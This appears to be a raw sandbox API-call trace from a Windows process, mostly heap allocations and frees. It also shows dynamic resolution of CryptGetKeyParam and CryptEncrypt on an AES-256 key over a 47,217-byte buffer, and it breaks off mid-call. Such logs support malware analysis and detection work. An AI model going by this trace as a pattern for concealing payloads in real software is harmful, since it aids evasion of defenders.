[0083.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0418 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0083.405] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0083.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3740 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0083.405] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2eb0 [0083.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2eb0 | out: hHeap=0x1780000) returned 1 [0083.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0083.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0083.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0083.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0083.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0083.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0083.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0083.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0083.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0083.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0418 | out: hHeap=0x1780000) returned 1 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0083.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0083.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0530 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ec0 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0083.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0083.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ec0 | out: hHeap=0x1780000) returned 1 [0083.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e70 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.408] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ed0 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f00 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e50 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d70 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dc0 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ee0 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e40 | out: hHeap=0x1780000) returned 1 [0083.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e30 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ef0 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d90 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d30 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d80 | out: hHeap=0x1780000) returned 1 [0083.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0083.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0083.409] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0508 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e30 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f00 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2de0 | out: hHeap=0x1780000) returned 1 [0083.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e50 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e30 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0350 | out: hHeap=0x1780000) returned 1 [0083.410] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e2d20, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2d20*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d50 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b60 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f20 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3950 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ec0 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a40 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38d8 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e40 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38a8 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38c0 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e70 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a28 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e00 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e90 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e20 | out: hHeap=0x1780000) returned 1 [0083.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ee0 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e10 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03f0 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0083.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.412] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e50 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.412] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2da0 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e60 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.412] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e60 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0083.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f20 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f10 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2df0 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d60 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0508 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41acd00 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c39c8 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e30 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0083.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0083.413] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0083.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0083.414] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3aa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0083.415] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0xb865, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0xb870) returned 1 [0083.415] CharLowerBuffW (in: lpsz="byte[47217]", cchLength=0xb | out: lpsz="byte[47217]") returned 0xb [0083.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3d58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0083.417] CryptEncrypt (in: 